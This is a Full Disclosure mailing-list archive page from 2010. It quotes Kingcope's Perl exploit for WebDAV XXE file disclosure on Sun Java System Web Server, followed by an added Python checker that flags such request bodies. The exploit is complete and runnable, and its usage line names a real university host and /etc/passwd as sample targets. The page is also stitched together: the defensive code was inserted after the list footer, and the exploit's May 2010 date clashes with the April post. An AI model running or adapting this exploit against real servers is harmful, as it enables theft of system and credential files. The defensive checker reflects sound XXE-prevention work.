Full Disclosure mailing list archives
Re: Sun D3VS SM0KiNG PoT AGAiN
From: Christian Sciberras <uuf6429 () gmail com>
Date: Sat, 3 Apr 2010 16:37:19 +0200
"Sun D3VS SM0KiNG PoT AGAiN"
"SuPP0RT iF YOU#RE kRAD KTHX"

What the fuck is wrong with you guys? Ever given the psychiatrist a visit?

On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2 () googlemail com> wrote:
sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD KTHX

#!/usr/bin/perl
# aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX

use IO::Socket;
use MIME::Base64;

print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote File Disclosure Exploit\n";
print "//by Kingcope\n";
print "May/2010\n";

if ($#ARGV != 2) {
    print "usage: perl sunone.pl <target> <webdav directory> <file to get>\n";
    print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd\n";
    exit;
}

$target     = $ARGV[0];
$| = 1;
$remotefile = $ARGV[2];
$folder     = $ARGV[1];

# LOCK request body: the internal DTD declares an external entity whose SYSTEM
# identifier is the requested file, and that entity is referenced inside the
# lock owner element, so a parser that resolves external entities expands the
# file contents into the owner value.
$KRADXmL = "<?xml version=\"1.0\"?>\n"
    ."<!DOCTYPE REMOTE [\n"
    ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
    ."]>\n"
    ."<D:lockinfo xmlns:D='DAV:'>\n"
    ."<D:lockscope><D:exclusive/></D:lockscope>\n"
    ."<D:locktype><D:write/></D:locktype>\n"
    ."<D:owner>\n"
    ."<D:href>\n"
    ."<REMOTE>\n"
    ."<RemoteX>&RemoteX;</RemoteX>\n"
    ."</REMOTE>\n"
    ."</D:href>\n"
    ."</D:owner>\n"
    ."</D:lockinfo>\n";

$sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp')
    or die "connect to $target:80 failed: $!\n";
print $sock "LOCK /$folder HTTP/1.1\r\n"
    ."Host: $target\r\n"
    ."Depth: 0\r\n"
    ."Connection: close\r\n"
    ."Content-Type: application/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n"
    .$KRADXmL;

# Print the LOCK response and remember the lock token for the UNLOCK below.
$locktoken = "";
while (<$sock>) {
    if ($_ =~ /^Lock-token:\s(.*)?\r/) {
        $locktoken = $1;
        chomp $locktoken;
    }
    print;
}
close($sock);

# Release the lock so the collection is not left locked.
$sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp')
    or die "connect to $target:80 failed: $!\n";
print $sock "UNLOCK /$folder HTTP/1.1\r\n"
    ."Host: $target\r\n"
    ."Connection: close\r\n"
    ."Lock-token: $locktoken\r\n\r\n";
while (<$sock>) {
    print;
}
close($sock);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
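A defender-side check for the request shape shown in the quoted script, added here as an example for this archive page (it is not code from the thread or from Kingcope). It parses a WebDAV LOCK body with Python's standard-library expat parser, records any DOCTYPE and any entity declared with a SYSTEM or PUBLIC identifier, and aborts the parse instead of resolving an external entity reference. Both sample bodies are constructed; the file path in the suspicious one is a placeholder, not a real path.

```python
"""Inspect WebDAV request bodies for external-entity (XXE) payloads.

Added example using only Python's standard library (xml.parsers.expat).
The sample bodies below are constructed for the demonstration.
"""
import xml.parsers.expat

# Constructed sample in the shape of the LOCK body from the quoted script;
# the SYSTEM identifier is a placeholder, not a real file.
SUSPICIOUS_LOCK_BODY = b"""<?xml version="1.0"?>
<!DOCTYPE REMOTE [
<!ENTITY RemoteX SYSTEM "/PLACEHOLDER/path/to/file">
]>
<D:lockinfo xmlns:D='DAV:'>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
<D:owner><D:href><REMOTE><RemoteX>&RemoteX;</RemoteX></REMOTE></D:href></D:owner>
</D:lockinfo>
"""

# Constructed benign LOCK body in the RFC 4918 shape: no DTD at all.
BENIGN_LOCK_BODY = b"""<?xml version="1.0" encoding="utf-8"?>
<D:lockinfo xmlns:D="DAV:">
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
<D:owner><D:href>http://example.invalid/users/alice</D:href></D:owner>
</D:lockinfo>
"""


def inspect_xml_body(body: bytes) -> dict:
    """Parse `body` without resolving anything external and report what it declares.

    Returns a dict with:
      doctype            - True if a DOCTYPE declaration was seen
      external_entities  - [(entity name, system id), ...] for SYSTEM/PUBLIC entities
      external_refs      - number of references to external entities in content
      parse_error        - expat error text, or None (set when the parse is aborted)
    """
    report = {"doctype": False, "external_entities": [],
              "external_refs": 0, "parse_error": None}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Internal entities carry a value; external ones carry SYSTEM/PUBLIC ids.
        if sysid is not None or pubid is not None:
            report["external_entities"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Returning 0 tells expat to stop: the referenced file/URL is never opened.
        report["external_refs"] += 1
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError as exc:
        report["parse_error"] = str(exc)
    return report


def is_acceptable_dav_body(body: bytes) -> bool:
    """Policy: a WebDAV request body must be well-formed and carry no DOCTYPE."""
    report = inspect_xml_body(body)
    return not report["doctype"] and report["parse_error"] is None


if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS_LOCK_BODY), ("benign", BENIGN_LOCK_BODY)):
        print(label, inspect_xml_body(body), "accept" if is_acceptable_dav_body(body) else "reject")
```

A front-end proxy or the DAV handler itself can run `is_acceptable_dav_body` before the body reaches the application's XML parser. Rejecting any DOCTYPE is deliberately stricter than only refusing external entities: DAV bodies have no legitimate use for a DTD, so the check also stops internal-entity expansion tricks that the entity-declaration hook alone would not flag. The parser-side fix remains disabling external entity resolution in whatever XML library the server uses.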
Current thread:
- Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Christian Sciberras (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Christian Sciberras (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)